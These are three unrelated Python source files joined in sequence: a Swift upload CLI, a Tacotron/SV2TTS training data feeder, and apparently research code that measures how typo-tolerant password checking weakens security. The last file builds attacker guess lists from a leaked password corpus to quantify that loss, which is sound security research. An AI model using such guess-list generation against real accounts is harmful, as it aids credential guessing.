partition=p.get('partition'),
footer=p.get('footer'),
delete_after=p.get('delete_after', 15552000),
prefix=p.get('prefix'),
public=p.get('public'))
module.exit_json(changed=True,
url=url)
def cli_main():
parser = argparse.ArgumentParser(
description="Upload files to swift"
)
parser.add_argument('--verbose', action='store_true',
help='show debug information')
parser.add_argument('--no-indexes', action='store_true',
help='do not generate any indexes at all')
parser.add_argument('--no-parent-links', action='store_true',
help='do not include links back to a parent dir')
parser.add_argument('--create-topdir-parent-link', action='store_true',
help='include a link in the root directory of the '
'files to the parent directory which may be the '
'index of all results')
parser.add_argument('--no-public', action='store_true',
help='do not create the container as public')
parser.add_argument('--partition', action='store_true',
help='partition the prefix into multiple containers')
parser.add_argument('--append-footer', default='index_footer.html',
help='when generating an index, if the given file is '
'present in a directory, append it to the index '
'(set to "none" to disable)')
parser.add_argument('--delete-after', default=15552000,
help='Number of seconds to delete object after '
'upload. Default is 6 months (15552000 seconds) '
'and if set to 0 X-Delete-After will not be set',
type=int)
parser.add_argument('--prefix',
help='Prepend this path to the object names when '
'uploading')
parser.add_argument('--dry-run', action='store_true',
help='do not attempt to create containers or upload, '
'useful with --verbose for debugging')
parser.add_argument('cloud',
help='Name of the cloud to use when uploading')
parser.add_argument('container',
help='Name of the container to use when uploading')
parser.add_argument('files', nargs='+',
help='the file(s) to upload with recursive glob '
'matching when supplied as a string')
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
# Set requests log level accordingly
logging.getLogger("requests").setLevel(logging.DEBUG)
logging.captureWarnings(True)
append_footer = args.append_footer
if append_footer.lower() == 'none':
append_footer = None
url = run(args.cloud, args.container, args.files,
indexes=not args.no_indexes,
parent_links=not args.no_parent_links,
topdir_parent_link=args.create_topdir_parent_link,
partition=args.partition,
footer=append_footer,
delete_after=args.delete_after,
prefix=args.prefix,
public=not args.no_public,
dry_run=args.dry_run)
print(url)
if __name__ == '__main__':
# Avoid unactionable warnings
requestsexceptions.squelch_warnings(
requestsexceptions.InsecureRequestWarning)
if sys.stdin.isatty():
cli_main()
else:
ansible_main()
|
feeder.py
|
from sklearn.model_selection import train_test_split
from synthesizer.utils.text import text_to_sequence
from synthesizer.infolog import log
import tensorflow as tf
import numpy as np
import threading
import time
import os
_batches_per_group = 64
class Feeder:
"""
Feeds batches of data into queue on a background thread.
"""
def __init__(self, coordinator, metadata_filename, hparams):
super(Feeder, self).__init__()
self._coord = coordinator
self._hparams = hparams
self._cleaner_names = [x.strip() for x in hparams.cleaners.split(",")]
self._train_offset = 0
self._test_offset = 0
# Load metadata
self._mel_dir = os.path.join(os.path.dirname(metadata_filename), "mels")
self._embed_dir = os.path.join(os.path.dirname(metadata_filename), "embeds")
with open(metadata_filename, encoding="utf-8") as f:
self._metadata = [line.strip().split("|") for line in f]
frame_shift_ms = hparams.hop_size / hparams.sample_rate
hours = sum([int(x[4]) for x in self._metadata]) * frame_shift_ms / (3600)
log("Loaded metadata for {} examples ({:.2f} hours)".format(len(self._metadata), hours))
#Train test split
if hparams.tacotron_test_size is None:
assert hparams.tacotron_test_batches is not None
test_size = (hparams.tacotron_test_size if hparams.tacotron_test_size is not None
else hparams.tacotron_test_batches * hparams.tacotron_batch_size)
indices = np.arange(len(self._metadata))
train_indices, test_indices = train_test_split(indices,
test_size=test_size, random_state=hparams.tacotron_data_random_state)
        #Make sure the test set is a whole multiple of batch_size; the extra examples go back to the train set
len_test_indices = self._round_down(len(test_indices), hparams.tacotron_batch_size)
extra_test = test_indices[len_test_indices:]
test_indices = test_indices[:len_test_indices]
train_indices = np.concatenate([train_indices, extra_test])
self._train_meta = list(np.array(self._metadata)[train_indices])
self._test_meta = list(np.array(self._metadata)[test_indices])
self.test_steps = len(self._test_meta) // hparams.tacotron_batch_size
if hparams.tacotron_test_size is None:
assert hparams.tacotron_test_batches == self.test_steps
#pad input sequences with the <pad_token> 0 ( _ )
self._pad = 0
        #explicitly setting the padding to a value that doesn't originally exist in the spectrogram
        #to avoid any possible conflicts, without affecting the output range of the model too much
if hparams.symmetric_mels:
self._target_pad = -hparams.max_abs_value
else:
self._target_pad = 0.
#Mark finished sequences with 1s
self._token_pad = 1.
with tf.device("/cpu:0"):
            # Create placeholders for inputs and targets. Don't specify batch size because we want
# to be able to feed different batch sizes at eval time.
self._placeholders = [
tf.compat.v1.placeholder(tf.int32, shape=(None, None), name="inputs"),
tf.compat.v1.placeholder(tf.int32, shape=(None, ), name="input_lengths"),
tf.compat.v1.placeholder(tf.float32, shape=(None, None, hparams.num_mels),
name="mel_targets"),
tf.compat.v1.placeholder(tf.float32, shape=(None, None), name="token_targets"),
tf.compat.v1.placeholder(tf.int32, shape=(None, ), name="targets_lengths"),
tf.compat.v1.placeholder(tf.int32, shape=(hparams.tacotron_num_gpus, None),
name="split_infos"),
# SV2TTS
tf.compat.v1.placeholder(tf.float32, shape=(None, hparams.speaker_embedding_size),
name="speaker_embeddings")
]
# Create queue for buffering data
queue = tf.queue.FIFOQueue(8, [tf.int32, tf.int32, tf.float32, tf.float32,
tf.int32, tf.int32, tf.float32], name="input_queue")
self._enqueue_op = queue.enqueue(self._placeholders)
self.inputs, self.input_lengths, self.mel_targets, self.token_targets, \
self.targets_lengths, self.split_infos, self.speaker_embeddings = queue.dequeue()
self.inputs.set_shape(self._placeholders[0].shape)
self.input_lengths.set_shape(self._placeholders[1].shape)
self.mel_targets.set_shape(self._placeholders[2].shape)
self.token_targets.set_shape(self._placeholders[3].shape)
self.targets_lengths.set_shape(self._placeholders[4].shape)
self.split_infos.set_shape(self._placeholders[5].shape)
self.speaker_embeddings.set_shape(self._placeholders[6].shape)
# Create eval queue for buffering eval data
eval_queue = tf.queue.FIFOQueue(1, [tf.int32, tf.int32, tf.float32, tf.float32,
tf.int32, tf.int32, tf.float32], name="eval_queue")
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, \
self.eval_token_targets, self.eval_targets_lengths, \
self.eval_split_infos, self.eval_speaker_embeddings = eval_queue.dequeue()
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_input_lengths.set_shape(self._placeholders[1].shape)
self.eval_mel_targets.set_shape(self._placeholders[2].shape)
self.eval_token_targets.set_shape(self._placeholders[3].shape)
self.eval_targets_lengths.set_shape(self._placeholders[4].shape)
self.eval_split_infos.set_shape(self._placeholders[5].shape)
self.eval_speaker_embeddings.set_shape(self._placeholders[6].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name="background", target=self._enqueue_next_train_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
thread = threading.Thread(name="background", target=self._enqueue_next_test_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
def _get_test_groups(self):
meta = self._test_meta[self._test_offset]
self._test_offset += 1
text = meta[5]
input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
#Create parallel sequences containing zeros to represent a non finished sequence
token_target = np.asarray([0.] * (len(mel_target) - 1))
embed_target = np.load(os.path.join(self._embed_dir, meta[2]))
return input_data, mel_target, token_target, embed_target, len(mel_target)
def make_test_batches(self):
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
#Test on entire test set
examples = [self._get_test_groups() for i in range(len(self._test_meta))]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated %d test batches of size %d in %.3f sec" % (len(batches), n, time.time() - start))
return batches, r
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.tacotron_batch_size
r = self._hparams.outputs_per_step
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples based on similar output sequence length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log("\nGenerated {} train batches of size {} in {:.3f} sec".format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
#Create test batches once and evaluate on them for all test steps
test_batches, r = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
def _get_next_example(self):
"""Gets a single example (input, mel_target, token_target, linear_target, mel_length) from_ disk
"""
if self._train_offset >= len(self._train_meta):
self._train_offset = 0
np.random.shuffle(self._train_meta)
meta = self._train_meta[self._train_offset]
self._train_offset += 1
text = meta[5]
input_data = np.asarray(text_to_sequence(text, self._cleaner_names), dtype=np.int32)
mel_target = np.load(os.path.join(self._mel_dir, meta[1]))
#Create parallel sequences containing zeros to represent a non finished sequence
token_target = np.asarray([0.] * (len(mel_target) - 1))
embed_target = np.load(os.path.join(self._embed_dir, meta[2]))
return input_data, mel_target, token_target, embed_target, len(mel_target)
def _prepare_batch(self, batches, outputs_per_step):
assert 0 == len(batches) % self._hparams.tacotron_num_gpus
size_per_device = int(len(batches) / self._hparams.tacotron_num_gpus)
np.random.shuffle(batches)
inputs = None
mel_targets = None
token_targets = None
targets_lengths = None
split_infos = []
targets_lengths = np.asarray([x[-1] for x in batches], dtype=np.int32) #Used to mask loss
input_lengths = np.asarray([len(x[0]) for x in batches], dtype=np.int32)
for i in range(self._hparams.tacotron_num_gpus):
batch = batches[size_per_device*i:size_per_device*(i+1)]
input_cur_device, input_max_len = self._prepare_inputs([x[0] for x in batch])
inputs = np.concatenate((inputs, input_cur_device), axis=1) if inputs is not None else input_cur_device
mel_target_cur_device, mel_target_max_len = self._prepare_targets([x[1] for x in batch], outputs_per_step)
mel_targets = np.concatenate(( mel_targets, mel_target_cur_device), axis=1) if mel_targets is not None else mel_target_cur_device
#Pad sequences with 1 to infer that the sequence is done
token_target_cur_device, token_target_max_len = self._prepare_token_targets([x[2] for x in batch], outputs_per_step)
token_targets = np.concatenate((token_targets, token_target_cur_device),axis=1) if token_targets is not None else token_target_cur_device
split_infos.append([input_max_len, mel_target_max_len, token_target_max_len])
split_infos = np.asarray(split_infos, dtype=np.int32)
### SV2TTS ###
embed_targets = np.asarray([x[3] for x in batches])
##############
return inputs, input_lengths, mel_targets, token_targets, targets_lengths, \
split_infos, embed_targets
def _prepare_inputs(self, inputs):
max_len = max([len(x) for x in inputs])
return np.stack([self._pad_input(x, max_len) for x in inputs]), max_len
def _prepare_targets(self, targets, alignment):
max_len = max([len(t) for t in targets])
data_len = self._round_up(max_len, alignment)
return np.stack([self._pad_target(t, data_len) for t in targets]), data_len
def _prepare_token_targets(self, targets, alignment):
max_len = max([len(t) for t in targets]) + 1
data_len = self._round_up(max_len, alignment)
return np.stack([self._pad_token_target(t, data_len) for t in targets]), data_len
def _pad_input(self, x, length):
return np.pad(x, (0, length - x.shape[0]), mode="constant", constant_values=self._pad)
def _pad_target(self, t, length):
return np.pad(t, [(0, length - t.shape[0]), (0, 0)], mode="constant", constant_values=self._target_pad)
def _pad_token_target(self, t, length):
return np.pad(t, (0, length - t.shape[0]), mode="constant", constant_values=self._token_pad)
def _round_up(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _round_down(self, x, multiple):
remainder = x % multiple
return x if remainder == 0 else x - remainder
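# Worked example (illustrative): with outputs_per_step r = 3, a 7-frame mel target is
# padded up to _round_up(7, 3) = 9 frames by _prepare_targets, while _round_down(7, 3) = 6
# is the kind of truncation used above to keep the test split a whole number of batches.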
|
compute_guesses_numpy.py
|
# Compute the security loss of edit-distance-1 correction for q guesses.
# Required: a typo model, or a way to generate the neighborhood of a password.
# 1. Create the neighborhood graph of the real passwords, and then
# 2. create the ball structure (somehow).
# 3. Once we have data structures for balls and neighbors, computing
#    guesses is a no-brainer.
# Main challenge: how to store those data structures on disk and load them.
# What I do right now: create a trie of the typos and a gigantic matrix
# for the neighborhood map; this is okay because we decided to use a
# fixed-length neighborhood. The balls are sometimes stored and sometimes
# just computed on the fly.
## TODO: Updatable typo trie, so that given a typo trie, we can add more
## items to it.
import string
import sys, os
homedir = os.path.expanduser('~')
sys.path.append('{}/passwords/'.format(homedir))
from readpw import Passwords
# from pwmodel import fast_fuzzysearch, HistPw
from heap import priority_dict
import numpy as np
import os, sys, json
import time
import multiprocessing
from word2keypress import Keyboard
from word2keypress.weighted_edist import sample_typos, get_topk_typos
from zxcvbn import password_strength
import itertools
from multiprocessing import Process
num2sym = dict(zip("`1234567890-=~!@#$%^&*()_+", "~!@#$%^&*()_+`1234567890-="))
MIN_PASS_LEN = 5
KB = Keyboard()
allowed_chars = string.printable[:-5]
MIN_ENTROPY_CUTOFF = 10
REL_ENT_CUTOFF = -3
EDIT_DIST_CUTOFF = 1
MAX_NH_SIZE = 1000
CACHE_SIZE = 10
N = int(1e6) # Number of rockyou password to consider
SPLIT = 10000
Q = 1000
def set_globals(settings_i):
# MIN_ENT, REL_ENT, MAX_NH_SIZE, CACHE_SIZE,
global N, MIN_ENTROPY_CUTOFF, REL_ENT_CUTOFF, MAX_NH_SIZE, CACHE_SIZE, Q
settings = [
(1e4, 10, -3, 10, 5, 1000), # online w/ blacklist
(1e4, 0, 0, 10, 5, 1000), # online w/o blacklist
(1e5, 10, -3, 10, 5, 10000), # offline w/ blacklist
(1e5, 0, 0, 10, 5, 10000), # offline w/o blacklist
]
(N, MIN_ENTROPY_CUTOFF, REL_ENT_CUTOFF, MAX_NH_SIZE, CACHE_SIZE, Q) = settings[settings_i]
return settings[settings_i]
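# For example (restating the table above), set_globals(2) selects the offline attack
# with a blacklist: N = 1e5, MIN_ENTROPY_CUTOFF = 10, REL_ENT_CUTOFF = -3,
# MAX_NH_SIZE = 10, CACHE_SIZE = 5 and Q = 10000 guesses.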
def get_nh(w):
"""
Find the neighborhood of a password w, also enforces the policies.
1. the minimum entropy cutoff
2. the relative entropy cutoff
3. edit distance cutoff, no options, only 1
## HARD CUTOFF of 300 only
"""
ent_w = entropy(w)
ret = ['' for _ in xrange(MAX_NH_SIZE+1)]
ret[0] = w
i = 1
done = set([w])
def filter_(tpw):
if tpw in done: return False
done.add(tpw)
tpw = str(tpw.encode('utf-8', errors='ignore'))
if MIN_ENTROPY_CUTOFF != 0 and REL_ENT_CUTOFF != 0:
ent_tpw = entropy(tpw)
return (ent_tpw>=MIN_ENTROPY_CUTOFF and
(ent_tpw-ent_w)>=REL_ENT_CUTOFF)
else:
return True
for tpw in KB.word_to_typos(str(w)):
if not filter_(tpw): continue
ret[i] = tpw
i += 1
if i>MAX_NH_SIZE:
break
return ret
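# Illustrative note (not from the original source): get_nh("password1") returns a
# fixed-length list of MAX_NH_SIZE+1 strings -- the password itself at index 0,
# then the typos from KB.word_to_typos that survive the cutoffs above, padded
# with '' when fewer than MAX_NH_SIZE typos qualify.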
def entropy(w):
try:
return password_strength(w)['entropy']
except Exception as e:
print (e)
return -1
pwd = os.path.dirname(os.path.abspath(__file__))
from collections import OrderedDict
import marisa_trie
def create_part_pw_nh_graph(args):
pwm, s, e = args
assert e>s
if len(pwm)<s: return
e = min(len(pwm), e)
typodir = '{}/typodir'.format(pwd)
tpw_trie_fname = '{}/{}__{}_{}_typo.trie'.format(typodir, pwm.fbasename, s, e)
rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'.format(typodir, pwm.fbasename, s, e)
if os.path.exists(tpw_trie_fname) and os.path.exists(rpw_nh_graph):
typo_trie = marisa_trie.Trie()
typo_trie.load(tpw_trie_fname)
M = np.load(rpw_nh_graph)['M']
return typo_trie, M
typos = OrderedDict()
k = e-s
M = np.full((k, MAX_NH_SIZE+1), -1, dtype=int)
# typo_f = open('{}/typos.txt', 'a')
def get_typo_id(typo):
try:
return typos[typo]
except KeyError:
# typo_f.write(typo + '\n')
typos[typo] = len(typos)
return typos[typo]
average_nh_size = 0
for i, (pwid, f) in enumerate(pwm):
if i>=e: break
if i<s: continue
rpw = str(pwm.id2pw(pwid).encode('ascii', errors='ignore'))
nh = get_nh(rpw)
# M[i-s, 0] = pwid
average_nh_size += len(nh)
M[i-s, :len(nh)] = np.fromiter((get_typo_id(tpw) for tpw in nh), dtype=int)
if (i>s and i%400==0):
print "Done {} -- len(typos)={}".format(i, len(typos))
if not os.path.exists(typodir):
os.makedirs(typodir)
typo_keys = typos.keys()
typo_trie = marisa_trie.Trie(typo_keys)
for i in xrange(k):
M[i] = np.fromiter(
(typo_trie.key_id(unicode(typo_keys[c])) if c>=0 else -1
for c in M[i]),
dtype=int
)
np.savez_compressed(rpw_nh_graph, M=M)
typo_trie.save(tpw_trie_fname)
print("Average NH size: {}".format(average_nh_size/float(k)))
return
M = None
def _update_M(global_typo_trie, trie_i, tM):
A = np.zeros(len(trie_i))
for k, _id in trie_i.iteritems():
A[_id] = global_typo_trie.key_id(k)
for i in xrange(tM.shape[0]):
tM[i] = A[tM[i]]
return tM
def join_pw_nh_graphs(args):
pwm, split, s, e = args
if s > len(pwm):
return
e = min(e, len(pwm))
typodir = '{}/typodir'.format(pwd)
tpw_trie_fname = '{}/{}__{{}}_{{}}_typo.trie'.format(typodir, pwm.fbasename)
rpw_nh_graph = '{}/{}__{{}}_{{}}_rpw_nh_graph.npz'.format(typodir, pwm.fbasename)
joined_tpw_trie_fname = '{}/{}__{}_{}_typo.trie'\
.format(typodir, pwm.fbasename, s, e)
joined_rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'\
.format(typodir, pwm.fbasename, s, e)
if os.path.exists(joined_rpw_nh_graph) and os.path.exists(joined_tpw_trie_fname):
        print(
            "{} and {} exist. So returning"\
            .format(os.path.basename(joined_tpw_trie_fname),
                    os.path.basename(joined_rpw_nh_graph))
        )
return
tries = []
N = e-s
print("Joining: {}".format(args))
M = np.full((N, MAX_NH_SIZE+1), fill_value=-1, dtype=int)
for i in xrange(0, N, split):
ts, te = i+s, i+s+split
if ts>len(pwm): continue
te = min(te, len(pwm))
typo_trie = marisa_trie.Trie()
typo_trie.load(tpw_trie_fname.format(ts, te))
tries.append(typo_trie)
print("Reading: {}".format(rpw_nh_graph.format(ts, te))),
M[i:i+split] = np.load(rpw_nh_graph.format(ts, te))['M']
print("...Done")
print("Joining trees")
global_typo_trie = marisa_trie.Trie(
k
for tt in tries
for k in tt.iterkeys()
)
print("Number of typos: ", len(global_typo_trie))
args = ((global_typo_trie, tries[i/split], M[i:i+split])
for i in xrange(0, N, split))
# pool = multiprocessing.Pool()
# res = map(_update_M, args)
for i in xrange(0, N, split):
trie_i = tries[i/split]
# M[i:i+split] = _update_M(global_typo_trie, trie_i, M[i:i+split])
M[i:i+split] = _update_M(global_typo_trie, trie_i, M[i:i+split])
# for i in xrange(M.shape[0]):
# if i % split == 0:
# print("Accumulating: {}".format(i))
# trie_i = tries[i/split]
# for j in xrange(M.shape[1]):
# if M[i, j]<0: continue
# M[i, j] = global_typo_trie.key_id(trie_i.restore_key(M[i, j]))
print("Saving all data... {} {}".format(joined_tpw_trie_fname, joined_rpw_nh_graph))
np.savez_compressed(joined_rpw_nh_graph, M=M)
global_typo_trie.save(joined_tpw_trie_fname)
print("Done!")
def create_pw_nh_graph(fname):
pwm = Passwords(fname, max_pass_len=25, min_pass_len=5)
split = SPLIT
# N = 1000
pool = multiprocessing.Pool()
# Create with split 1000
args = [(pwm, i, i+split) for i in xrange(0, N, split)]
pool.map(create_part_pw_nh_graph, args)
print("Done creating all the parts")
# Join 10 at time.
multiplier = 10
if N<1e5:
        join_pw_nh_graphs((pwm, split, 0, N))
else:
args1 = [(pwm, split, i, i+split*100) for i in xrange(0, N, split*100)]
pool.map(join_pw_nh_graphs, args1)
join_pw_nh_graphs((pwm, split*100, 0, N))
# while split < N:
# args = [(pwm, split, i, i+split*multiplier)
# for i in xrange(0, N, split*multiplier)]
# pool.map(join_pw_nh_graphs, args)
# split *= multiplier
def read_pw_nh_graph(fname, q=-1, _N=-1):
"""Reads the typo trie file and the neighborhood map created by
`create_pw_nh_graph` function.
Returns: (M, A, typo_trie)
M is the rpw -> Neighborhood information
- M[i][0] is the rpw_id, of i-th most probable password
- M[i][1:] is the neighborhood, truncted to MAX_NH_SIZE (500)
A is the weight of the balls of all the typos we collected
- A[i] = Total sum of frequencies of all the rpw in the ball
of i-th password in trie. (see typo_trie)
typo_trie is a maping from typo_id to typos, so, to retrieve
the i-th typo in A[i], use typo_trie.restore_key(i).
typo_trie is not required for computing the total success of
an attacker.
q: Prune the typo list based on q value, so that don't worry
about typos that are very low in the tail, for example, a
typo with total ball weight < 10*q-th most probable typo, is
most likely useless. Where assume the average ball size is 10.
"""
# N = 1000
global N
if _N>0:
N = _N
typodir = '{}/typodir'.format(pwd)
pwm = Passwords(fname, max_pass_len=25, min_pass_len=5)
N = min(N, len(pwm))
tpw_trie_fname = '{}/{}__{}_{}_typo.trie'\
.format(typodir, pwm.fbasename, 0, N)
rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'\
.format(typodir, pwm.fbasename, 0, N)
typo_trie = marisa_trie.Trie()
typo_trie.load(tpw_trie_fname)
M = np.load(rpw_nh_graph)['M']
## Extra fix ##
M[M==0] = -1
d = len(typo_trie)
A = np.zeros(len(typo_trie))
for i in xrange(M.shape[0]):
if M[i, 0] <=0:
continue
p_rpw = pwm.pw2freq(typo_trie.restore_key(M[i, 0]))
A[M[i, M[i]>=0]] += p_rpw
print("Done creating the 'A' array. Size={}".format(A.shape))
# # Prune the typos, Not all typos are useful, any typo with
# # frequency less than i_th most probable password will never be
# # queried.
# b = (M>0).sum() / float(A.shape[0]) # average ball size
# print("Average ball size: {}".format(b))
# bq_th_pw_f = pwm.id2freq(M[int(b*q)][0])
# useful_typos = (A>=bq_th_pw_f)
# print("Useful typos (> {}): {}/{}".format(
# bq_th_pw_f, useful_typos.sum(), A.shape[0]
# ))
return M, A, typo_trie, pwm
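# Usage sketch (hedged; the leak file name is only an example):
#   M, A, typo_trie, pwm = read_pw_nh_graph("rockyou-withcount.txt.bz2")
#   rpw = typo_trie.restore_key(M[0, 0])   # most probable real password
#   ball_weight = A[M[0, 1]]               # frequency mass covered by its first typo
# (assuming row 0 has at least one admissible neighbor, i.e. M[0, 1] >= 0).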
def get_topkcorr_typos(rpw, nh_size):
add_at_end = '1`0/234'
ret = [
        rpw.swapcase(), rpw[0].lower() + rpw[1:],
rpw[:-1] + num2sym.get(rpw[-1], rpw[-1]),
rpw[0] + rpw,
]
if len(ret)<=2*nh_size:
ret.extend((rpw + c for c in add_at_end))
ret.extend((c + rpw for c in add_at_end))
if len(ret)<=2*nh_size:
ret.extend((rpw[:-1], rpw[1:]))
ret.extend(
rpw[:i] + rpw[i].swapcase() + rpw[i+1:]
for i in xrange(1, len(rpw))
)
ent_rpw = entropy(rpw)
def filter_(tpw):
ent_tpw = entropy(tpw)
return (ent_tpw>=MIN_ENTROPY_CUTOFF and
(ent_tpw-ent_rpw)>=REL_ENT_CUTOFF)
done = set()
rret = ['' for _ in xrange(nh_size+1)]
rret[0] = rpw; done.add(rpw)
i = 1
for tpw in ret:
if tpw in done: continue
done.add(tpw)
if filter_(tpw):
rret[i] = tpw
i += 1
if i>= nh_size: break
    # rret is pre-padded to length nh_size+1, so return the filtered list directly.
    return rret
def get_typodist_nh(rpw, nh_size):
ent_rpw = entropy(rpw)
ret = ['' for _ in range(nh_size+1)]
ret[0] = rpw
done = set([rpw])
i = 1
typos = get_topk_typos(rpw, 2*nh_size)
# assert 0, "Useless process. Run with topk=True"
# typos = sample_typos(rpw, 2*nh_size)
for tpw in typos:
if tpw in done: continue
done.add(tpw)
ent_tpw = entropy(tpw)
if (ent_tpw>=MIN_ENTROPY_CUTOFF and
(ent_tpw-ent_rpw)>=REL_ENT_CUTOFF):
ret[i] = tpw
i += 1
if i>nh_size: break;
return ret
def _get_typos_for_typodist(pwm, q, nh_size, topk):
typos = OrderedDict()
def get_typo_id(_typo):
if not _typo: return -1
try:
return typos[_typo]
except KeyError:
# typo_f.write(typo + '\n')
typos[_typo] = len(typos)
return typos[_typo]
M = np.full((N, nh_size+1), -1, dtype=int)
i = 0
for (pwid, f) in pwm:
if i>=N: break
_a_rpw = pwm.id2pw(pwid)
rpw = str(_a_rpw.encode('ascii', errors='ignore'))
if pwid != pwm.pw2id(rpw):
print("Pwid changed for {!r} -> {!r}".format(_a_rpw, rpw))
continue
# if any(M[:, 0] == pwid):
# print("{!r} is already considered".format(rpw))
# continue
if len(rpw)<MIN_PASS_LEN: continue
if topk:
T = get_topkcorr_typos(rpw, nh_size)
else:
T = get_typodist_nh(rpw, nh_size)
M[i] = [
get_typo_id(tpw) if tpw else -1
for tpw in T
]
if (i>0 and i%1000==0):
print("({}) Processed: {}".format(proc_name, i))
i += 1
# A = A[A>0]
# typo_trie = marisa_trie.Trie(typos.keys())
# assert A.shape[0] == len(typos)
typos = typos.keys()
typo_trie = marisa_trie.Trie(typos)
A = np.zeros(len(typo_trie))
B = [[] for _ in xrange(len(typo_trie))]
for i in xrange(M.shape[0]):
f = pwm.pw2freq(typos[M[i, 0]])
for j in xrange(M.shape[1]):
o = M[i, j]
if o<0: continue
M[i, j] = typo_trie.key_id(unicode(typos[o]))
B[M[i, j]].append(i)
A[M[i, j]] += f
return M, B, A, typo_trie
def _read_typos(pwm, N, proc_name):
typodir = '{}/typodir'.format(pwd)
tpw_trie_fname = '{}/{}__{}_{}_typo.trie'\
.format(typodir, pwm.fbasename, N, proc_name)
rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'\
.format(typodir, pwm.fbasename, N, proc_name)
M = np.load(rpw_nh_graph)['M']
typo_trie = marisa_trie.Trie()
typo_trie.load(tpw_trie_fname)
A = np.zeros(len(typo_trie))
B = [[] for _ in xrange(len(typo_trie))]
for i in xrange(M.shape[0]):
rpw = typo_trie.restore_key(M[i, 0])
f = pwm.pw2freq(rpw)
rpw_ent = entropy(rpw)
assert f>=0, "rpw={}, freq={}".format(rpw, f)
for j in xrange(M.shape[1]):
if M[i,j]<0: continue
tpw = typo_trie.restore_key(M[i,j])
tpw_ent = entropy(tpw)
if (MIN_ENTROPY_CUTOFF>0 and tpw_ent < MIN_ENTROPY_CUTOFF) \
or (REL_ENT_CUTOFF>0 and (tpw_ent-rpw_ent)<REL_ENT_CUTOFF):
if j>0: M[i, j] = -1
continue
if M[i, j]>=0:
B[M[i, j]].append(i)
A[M[i,j]] += f
return M, B, A, typo_trie
def compute_guesses_using_typodist(fname, q, nh_size=5, topk=False, offline=False):
"""
Computes the Neighborhood based on sampling from the typo distribution.
"""
# Re-create the neighborhood, it should be small
global proc_name, N
print(N, MIN_ENTROPY_CUTOFF, REL_ENT_CUTOFF, nh_size)
if topk:
proc_name = "TOPKTypo-{}-{}-{}".format
else:
proc_name = "TYPODIST-{}-{}-{}".format
proc_name = proc_name(MIN_ENTROPY_CUTOFF, REL_ENT_CUTOFF,
('off' if offline else 'on'))
pwm = Passwords(fname, max_pass_len=25, min_pass_len=5)
typodir = '{}/typodir'.format(pwd)
pwm = Passwords(fname, max_pass_len=25, min_pass_len=5)
N = min(N, len(pwm))
tpw_trie_fname = '{}/{}__{}_{}_typo.trie'\
.format(typodir, pwm.fbasename, N, proc_name)
rpw_nh_graph = '{}/{}__{}_{}_rpw_nh_graph.npz'\
.format(typodir, pwm.fbasename, N, proc_name)
if os.path.exists(tpw_trie_fname) and os.path.exists(rpw_nh_graph):
M, B, A, typo_trie = _read_typos(pwm, N, proc_name)
else:
M, B, A, typo_trie = _get_typos_for_typodist(pwm, q, nh_size, topk)
np.savez_compressed(rpw_nh_graph, M=M)
typo_trie.save(tpw_trie_fname)
guesses = []
i = 0
killed = np.ones(M.shape[0], dtype=bool)
while len(guesses)<q:
gi = A.argmax() # tpwid of the i-th guess
# Set of rows where gi exists
killed_gi = B[gi]
killed[killed_gi] = False if not offline else True
e = (typo_trie.restore_key(gi), A[gi]/float(pwm.totalf()))
assert offline or (e not in guesses), "Guesses={}, e={}, killed_gi={}, M[killed_gi]={}"\
.format(guesses, e, gi, M[killed_gi])
if not guesses:
print "gi={}, {} -> {} ({}), "\
.format(gi, e[0], len(B[gi]),
[typo_trie.restore_key(c)
for c in M[killed_gi, 0]])
guesses.append(e)
for ri in killed_gi:
row = M[ri]
f = pwm.pw2freq(typo_trie.restore_key(row[0]))
if f<=0:
print("RPW freq is zero! rpw={}, f={}, guess={}"\
.format(typo_trie.restore_key(row[0]), f, typo_trie.restore_key(gi)))
continue
if offline:
if gi == row[0]:
killed[ri] = False
A[gi] = 0
else:
A[gi] -= f/float(nh_size)
else:
A[row] -= f
print("({}): {}> {:30s}: {:.3e} (killed={}/{})".format(
proc_name,
len(guesses), guesses[-1][0],
guesses[-1][1]*100, len(killed_gi), M.shape[0]-killed.sum()
))
# Sanity check
killed_ids = set(itertools.chain(*[B[typo_trie.key_id(t)] for t, _ in guesses]))
killed_pws_weight = sum(
pwm.pw2freq(typo_trie.restore_key(M[i, 0]))
for i in killed_ids
)
fuzzlambda_q = sum(g[1] for g in guesses)
assert (fuzzlambda_q - killed_pws_weight) < 1e-10, "{} -- {}"\
.format(fuzzlambda_q, killed_pws_weight)
print("({}): Total fuzzy success: {}"\
.format(proc_name, 100*fuzzlambda_q))
print("({}): Total normal success: {}"\
.format(proc_name, 100*pwm.sumvalues(q)/float(pwm.totalf())))
guess_f = 'guesses/{}_guesses_{}_typodist_{}_{}.json'\
.format(pwm.fbasename, q, nh_size, proc_name)
print("Saving the guesses:", guess_f)
with open(guess_f, 'w') as f:
json.dump(guesses, f, indent=4)
